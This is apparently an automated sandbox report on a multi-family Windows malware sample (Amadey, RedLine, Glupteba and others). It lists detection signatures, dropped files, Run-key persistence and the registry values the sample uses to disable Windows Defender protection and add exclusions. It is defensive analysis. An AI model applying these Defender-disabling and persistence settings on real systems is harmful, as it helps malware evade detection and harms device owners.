Malware Analysis Report

2025-01-23 09:39

Sample ID 231010-y768aabc66
Target file
SHA256 14f12ce7401d5053a66773e6700addad23fc1d4e64bddabbc445ab198e477647
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia microsoft
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

14f12ce7401d5053a66773e6700addad23fc1d4e64bddabbc445ab198e477647

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia microsoft

Suspicious use of NtCreateUserProcessOtherParentProcess

Healer

SmokeLoader

Detect Mystic stealer payload

Detects Healer an antivirus disabler dropper

Mystic

RedLine

Windows security bypass

RedLine payload

SectopRAT payload

Glupteba payload

SectopRAT

Amadey

DcRat

Modifies Windows Defender Real-time Protection settings

Glupteba

Detected google phishing page

Stops running service(s)

Drops file in Drivers directory

Modifies Windows Firewall

Downloads MZ/PE file

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Windows security modification

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand microsoft.

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Windows directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Uses Task Scheduler COM API

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:26

Reported

2023-10-10 20:37

Platform

win7-20230831-en

Max time kernel

150s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E66A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E8EA.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ECA3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F195.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9535.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9890.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\99D8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a5934857.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1WK02es6.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F195.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\42F0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\EDDC.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\Lq5hq4TW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3347808.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\E2A2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\ZI4xM2Zd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\pG3rS0fl.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Hf8Mh2Uh.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231010203613.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002bccc567d90a0b479b49b1b2d43318c300000000020000000000106600000001000020000000840ac0de2e39f20267e6589b05d05ab7e01e11b05b74b6f5e33c4e959c144992000000000e8000000002000020000000be63e8069dce961558ac05df72d388b2e007686007973b415f447b1edd9ca73d200000006502765eb3d6f7c143f6c7b3d3755ae79265477a566c91c8bd9a108e672c8724400000003b8c2a1e20b0af98a24e75ec39216bcd34535a66b7a25ded71e822e864bb28f7888fb7db05ef6bbe996805c58107980fc673d058b85fa3e5861fe1fdbf928d6e C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-607259312-1573743425-2763420908-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
